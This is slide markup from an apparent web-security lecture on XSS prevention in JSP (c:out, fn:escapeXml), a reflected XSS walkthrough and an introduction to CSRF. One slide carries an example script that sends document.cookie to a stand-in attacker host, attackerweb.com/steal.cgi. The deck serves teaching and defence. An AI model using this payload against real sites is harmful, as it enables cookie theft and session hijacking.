          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employee ID:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>c:out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> value="${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>eid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>}" /&gt;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employee ID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>"${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>fn:escapeXml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>eid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>)}"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Oval 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2095500" y="2647950"/>
            <a:ext cx="2273405" cy="2857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0363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266700" y="556461"/>
            <a:ext cx="8610600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>XSS vulnerable code example: JSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2051" name="Picture 3">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1685925"/>
            <a:ext cx="497205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828800" y="3514725"/>
            <a:ext cx="5638800" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Querying a database table for a given ID and prints employee's name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>without filtering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>HTML or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> meta characters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1848321" y="4733925"/>
            <a:ext cx="6439335" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employee Name:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>c:out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t> value="${name}" /&gt;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employee ID: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>"${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>fn:escapeXml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>(name)}"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1933575" y="5800725"/>
            <a:ext cx="4572000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Preventing XSS by encoding HTML special characters in JSTL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24305140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a:xfrm>
            <a:off x="381000" y="661392"/>
            <a:ext cx="8534400" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>A reflected XSS attack example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="510979" name="Object 3">
            <a:extLst>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="2"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="488721298"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="995362" y="1777030"/>
          <a:ext cx="2295525" cy="1371600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s4150" name="Bitmap Image" r:id="rId3" imgW="2933333" imgH="1752381" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId3" imgW="2933333" imgH="1752381" progId="PBrush">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="51097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5362" y="1777030"/>
                        <a:ext cx="22955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0980" name="Object 4">
            <a:extLst>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="3"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1847798040"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4957762" y="1754805"/>
          <a:ext cx="2817813" cy="1482725"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s4151" name="Bitmap Image" r:id="rId5" imgW="2895238" imgH="1523810" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId5" imgW="2895238" imgH="1523810" progId="PBrush">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="51098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7762" y="1754805"/>
                        <a:ext cx="2817813" cy="148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0981" name="Object 5">
            <a:extLst>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2838034098"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="157162" y="4291630"/>
          <a:ext cx="3659188" cy="614363"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s4152" name="Bitmap Image" r:id="rId7" imgW="3761905" imgH="828791" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId7" imgW="3761905" imgH="828791" progId="PBrush">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="510981"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2" y="4291630"/>
                        <a:ext cx="3659188"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0985" name="Object 9">
            <a:extLst>
              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3438109913"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="614362" y="4825030"/>
          <a:ext cx="2333625" cy="874712"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s4153" name="Bitmap Image" r:id="rId9" imgW="1961905" imgH="1181265" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId9" imgW="1961905" imgH="1181265" progId="PBrush">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="510985"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4362" y="4825030"/>
                        <a:ext cx="2333625"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0982" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="3224830"/>
            <a:ext cx="3529467" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(b) The web page displays a greeting message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510983" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="217487" y="5818805"/>
            <a:ext cx="4278313" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(c) Replace the value of username with JavaScript code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510984" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="233362" y="3224830"/>
            <a:ext cx="4243388" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(a) Website offers personalized views based on username</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4476750" y="4981793"/>
            <a:ext cx="4576762" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(d) &lt;SCRIPT&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = http://attackerweb.com/steal.cgi? + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;/SCRIPT&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404969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0979"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="510979"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51097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0984"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="510984"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51098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10980"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="510980"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51098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0982"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="510982"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51098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0981"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="510981"/>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10983"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="510983"/>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510985"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="box(in)">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51098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2" grpId="0"/>
      <p:bldP spid="510983" grpId="0"/>
      <p:bldP spid="510984" grpId="0"/>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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1390650" y="685800"/>
            <a:ext cx="6534150" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40965" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1748972"/>
            <a:ext cx="8305800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>generation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arbitrary HTTP requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>to a remote server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>without the knowledge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>of a user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Exploit the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inherent features</a:t>
